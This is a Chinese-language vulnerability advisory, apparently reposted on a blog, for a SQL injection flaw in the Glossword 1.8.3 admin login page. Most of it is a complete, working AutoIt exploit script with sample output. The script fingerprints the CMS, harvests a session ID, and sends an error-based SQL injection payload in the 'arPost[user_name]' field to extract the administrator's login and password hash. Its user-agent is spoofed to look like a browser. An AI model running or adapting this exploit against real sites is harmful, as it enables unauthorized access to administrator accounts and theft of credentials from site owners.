login.php入侵,Glossword 'login.php' SQL 注入漏洞

发布日期:2013-02-05

更新日期:2013-02-27

受影响系统:

sourceforge glossword 1.8.3

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 57732

Glossword是创建和发布在线多语言字典、词汇或百科全书的系统。

Glossword 1.8.3及其他版本的gw_admin/login.php脚本没有正确过滤'arPost[user_name]'参数值,允许攻击者在后端数据库内注入或操作SQL查询。

链接:http://osvdb.org/89882

http://xforce.iss.net/xforce/xfdb/81837

http://packetstormsecurity.com/files/120044/glossword1.8.3_sqli_exploit.txt

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#cs

==============================================================

Vulnerable Software: Glossword 1.8.3

Official site: http://sourceforge.net/projects/glossword/

Download: http://sourceforge.net/projects/glossword/files/glossword/1.8.3/

Vuln: SQLi

==================THIS IS A WHOLE EXPLOIT=====================

Exploit Coded In AutoIT.

To exploit this vulnerability magic_quotes_gpc must be turned off on server side.

Print screen: http://s004.radikal.ru/i206/1302/89/d7398ade1cd7.png

POC video: http://youtu.be/55IaNTQS3Fk

Exploit usage:

C:\0day>glossa.exe http://hacker1.own /glossword/glossword/ 2

##############################################################

#          Glossword 1.8.3 SQL injection Exploit            #

# Usage: glossa.exe http://site.tld  /installdir/  UID (int) #

#        DON'T HATE THE HACKER, HATE YOUR OWN CODE!          #

#            VULN/Exploit: AkaStep & HERO_AZE                #

##############################################################

##############################################################

[*] SENDING FAKE SESSUID: ea0f5d8c7c2c8a2f9f7c3b3e5a3d4f5d [*]

##############################################################

##############################################################

[*]                  CMS is GLOSSWORD!                    [*]

##############################################################

##############################################################

[*]                FETCHING VALID SESSUID                  [*]

##############################################################

##############################################################

[*]  Got VALID SESSUID: aa0e680bef2679932393abe72b78ef03  [*]

##############################################################

##############################################################

[*]                  !~ P*W*N*E*D ~!                      [*]

--------------------------------------------------------------

[*] Login: admin                                          [*]

--------------------------------------------------------------

[*] Password: (MD5) 260efaff0cac0f78a53ccc540e89e72d      [*]

--------------------------------------------------------------

Admin Panel: hacker1.own/glossword/glossword/gw_admin/login.php

--------------------------------------------------------------

[*]                    Good Luck;)                        [*]

##############################################################

[*]                    DONE                              [*]

##############################################################

#ce

#NoTrayIcon

#Region ;**** Directives created by AutoIt3Wrapper_GUI ****

#AutoIt3Wrapper_Outfile=glossa.exe

#AutoIt3Wrapper_UseUpx=n

#AutoIt3Wrapper_Change2CUI=y

#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****

#include "WinHttp.au3"

#include

#include

$triptrop=@CRLF & _StringRepeat('#',62) & @CRLF;

$exploitname=@CRLF & _StringRepeat('#',62) & @CRLF & _

'#' & _StringRepeat(' ',11) & 'Glossword 1.8.3 SQL injection Exploit ' & _StringRepeat(' ',11) & '#' & @CRLF  & _

'# Usage: ' & @ScriptName &  ' http://site.tld ' & ' /installdir/ ' & ' UID (int) #' & _

@CRLF & "#        DON'T HATE THE HACKER, HATE YOUR OWN CODE!          #" & @CRLF & _

'#            VULN/Exploit: AkaStep & HERO_AZE                #' & @CRLF & _StringRepeat('#',62);

ConsoleWrite(@CRLF & $exploitname & @CRLF)

$method='POST';

$vulnurl='gw_admin/login.php'

Global $sessid=0

$cmsindent='lossword'; # We will use it to identify CMS #;

$adminpanel=$vulnurl

;#~  Impersonate that We Are Not BOT or exploit.We are human who uses IE.# ~;

$useragent='Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; SV1; .NET CLR 1.1.4325)';

$msg_usage="Command Line Plizzzz => " & @CRLF & "Usage: " & @ScriptName &  ' http://site.tld ' & ' /installdir/ ' &  ' UID (int)' & @CRLF

if  $CmdLine[0] <> 3 Then

ConsoleWrite(@CRLF & _StringRepeat('#',62) & @CRLF & $msg_usage & @CRLF & _StringRepeat('#',62) & @CRLF);

MsgBox(64,"",$msg_usage);

exit;

EndIf

if $CmdLine[0]=3 Then

$targetsite=$CmdLine[1];

$installdir=$CmdLine[2];

$uidtoattack=Number(StringMid($CmdLine[3],1,255));

EndIf

if not StringIsDigit($uidtoattack) Then

ConsoleWrite(' UID is wrong! Exit' );

Exit;

EndIf

if StringStripWS($targetsite,8)='' OR StringStripWS($installdir,8)='' Then

ConsoleWrite('Are you kidding meeeeen?');

Exit;

EndIf

HttpSetUserAgent($useragent)

$doublecheck=InetGet($targetsite,'',1);

if @error Then

ConsoleWrite('[*] Incorrect Domain Name/Or you are Offline! [*]' & @CRLF)

Exit;

EndIf

sleep(Random(1200,2500,1));

sendfakeretrivevalidsess($targetsite,$installdir)

HttpSetUserAgent($useragent);

$sidentify=_INetGetSource($targetsite & $adminpanel,True);

Func exploit($targetsite,$installdir,$sessid)

Global $sAddress = $targetsite

Global $PAYLOADTOSEND ="arPost[user_name]=') AND (select floor(rand(0)*2) from(select count(*)," & _

"concat((select concat(0x3C73696B6469723E,login,0x7c,password,0x3C2F73696B6469723E,0x7c) from " & _

"gw_auth where id_auth=" & $uidtoattack & "),floor(rand(0)*2))x from information_schema.tables group by x)a)-- " & _

" AND 1=('1&arPost[user_email]=trueownage&a=lostpass&sid=" & $sessid & "&post=Send password";

Global $sDomain = $targetsite

Global $sPage = $installdir & $vulnurl

Global $sAdditionalData = $PAYLOADTOSEND

Global $hOpen = _WinHttpOpen($useragent)

Global $hConnect = _WinHttpConnect($hOpen, $sDomain)

Global $hRequest = _WinHttpOpenRequest($hConnect, "POST", $sPage, -1, -1, -1, '')

_WinHttpSendRequest($hRequest, "Content-Type: application/x-www-form-urlencoded", $sAdditionalData)

_WinHttpReceiveResponse($hRequest)

Global $sReturned

If _WinHttpQueryDataAvailable($hRequest) Then

Do

$sReturned &= _WinHttpReadData($hRequest)

Until @error

if StringInStr($sReturned,'') and StringInStr($sReturned,'') Then

$zsuxxv = StringRegExp($sReturned, '(.*?)(?i)sikdir>', 1)

For $x = 0 To UBound($zsuxxv) - 1

Beep(100,1000);

ConsoleWrite($triptrop & '[*]                  !~ P*W*N*E*D ~!                      [*] ' & _

StringReplace($triptrop,'#','-') & '[*] Login: ' & StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1) & _

_StringRepeat(' ',StringLen($triptrop)-18-StringLen(StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')-1))) & '[*]' & _

StringReplace($triptrop,'#','-') & '[*] Password: (MD5) ' & StringReplace($zsuxxv[$x],StringMid($zsuxxv[$x],1,StringInStr($zsuxxv[$x],'|')),'') & _

'      [*] ' & _

StringReplace($triptrop,'#','-') & _

'Admin Panel: ' & $targetsite & $installdir &$adminpanel & ' ' & StringReplace($triptrop,'#','-') & _

'[*]                    Good Luck;)                        [*]' & _

$triptrop & '[*]                    DONE                              [*]' & _

$triptrop);

Next

Else

ConsoleWrite($triptrop & '[*] ' & _StringRepeat(' ',18) & '  NO SUCH UID!  ' &  _StringRepeat(' ',18) & _

' [*]' & $triptrop);

Beep(1500,1000);

Exit

EndIf

EndIf

_WinHttpCloseHandle($hRequest)

_WinHttpCloseHandle($hConnect)

_WinHttpCloseHandle($hOpen)

EndFunc;=> exploit();

Func  sendfakeretrivevalidsess($targetsite,$installdir)

$fakesessionID='';

Do

$fakesessionID&=Chr(Random(97,102,1)) & Random(0,9,1)

until StringLen($fakesessionID)=32

$fakesessionID=StringMid($fakesessionID,Random(1,32,1),1) & StringMid($fakesessionID,1,StringLen($fakesessionID)-1)

ConsoleWrite($triptrop & '[*] SENDING FAKE SESSUID: ' & $fakesessionID &  ' [*] ' &  $triptrop)

sleep(Random(1000,2500,1))

$rtarget=$targetsite & $installdir &"gw_admin/login.php?visualtheme=gw_admin&sid=" &$fakesessionID;

HttpSetUserAgent($useragent);

$str=_INetGetSource($rtarget);

if StringInStr($str,"Session does not exist.") then

ConsoleWrite($triptrop & '[*]' &  _StringRepeat(' ',18) & 'CMS is GLOSSWORD!  ' &  _StringRepeat(' ',19) & '[*]' & $triptrop);

sleep(Random(1000,2500,1))

Else

ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',11) &'NOPE:( THIS IS NOT GLOSSWORD CMS.' &_StringRepeat(' ',12) &'[*]' & $triptrop);

exit;

EndIf

$i=123

$mystr='';

ConsoleWrite($triptrop & '[*]' & _StringRepeat(' ',16) & 'FETCHING VALID SESSUID' & _StringRepeat(' ',17) & ' [*]' & $triptrop)

sleep(Random(1000,2500,1))

Do

$i+=1;

if $i>=4000 then ExitLoop;//Just for make sure we are not going to infinitive loop if there any error occurs.//

$mystr&=StringMid($str,$i,1)

until StringInStr($mystr,chr(34));

$sessid=StringMid($mystr,StringInStr($mystr,Chr(61))+1,32)

if not $sessid =32 Then

ConsoleWrite($triptrop & '[*] Sorry Man! Theris an error while fetching new VALID SESSUID  [*]' & $triptrop)

exit;

Else

ConsoleWrite($triptrop & '[*]  Got VALID SESSUID: ' & $sessid &  '  [*]' & $triptrop)

EndIf

$targetsite=StringReplace(StringReplace($targetsite,'http://',''),'/','')

exploit($targetsite,$installdir,$sessid)

EndFunc;=>sendfakeretrivevalidsess();

#cs

================================================

KUDOSSSSSSS

================================================

packetstormsecurity.org

packetstormsecurity.com

packetstormsecurity.net

securityfocus.com

cxsecurity.com

security.nnov.ru

securtiyvulns.com

securitylab.ru

secunia.com

securityhome.eu

exploitsdownload.com

osvdb.com

websecurity.com.ua

1337day.com

itsecuritysolutions.org

to all Aa Team + to all Azerbaijan Black HatZ

+ *Especially to my bro CAMOUFL4G3 *

To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE

================================================

/AkaStep

#ce

建议:

--------------------------------------------------------------------------------

厂商补丁:

sourceforge

-----------

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sourceforge.net/projects/glossword/0b1331709591d260c1c78e86d0c51c18.png

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值